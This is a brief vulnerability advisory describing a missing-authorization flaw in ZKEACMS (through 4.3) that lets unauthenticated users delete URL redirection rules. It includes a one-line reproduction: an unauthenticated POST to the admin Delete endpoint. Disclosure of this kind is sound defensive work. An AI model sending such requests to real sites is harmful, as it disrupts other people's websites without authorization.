SeriaWei ZKEACMS Improper Authorization Vulnerability in Url Redirection Controller
Vulnerability
A vulnerability exists in SeriaWei ZKEACMS versions through 4.3, specifically in the UrlRedirectionController's Delete method. This vulnerability arises from a lack of proper authorization checks, allowing attackers to delete URL redirection rules without authentication or specific permissions. The absence of these rules can disrupt website functionality, leading to 404 errors on redirected pages, which negatively impacts user experience and SEO.
Impact
Exploitation of this vulnerability allows for unauthorized deletion of URL redirection rules, potentially causing website functionality issues and 404 errors on redirected pages, which can harm user experience and search engine optimization.
Reproduction
To reproduce this vulnerability, send a POST request to the /admin/UrlRedirection/Delete/{id} endpoint. This can be done without logging in or having any specific permissions. The request will delete the URL redirection rule associated with the specified ID.
Vulnerability Rating
Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.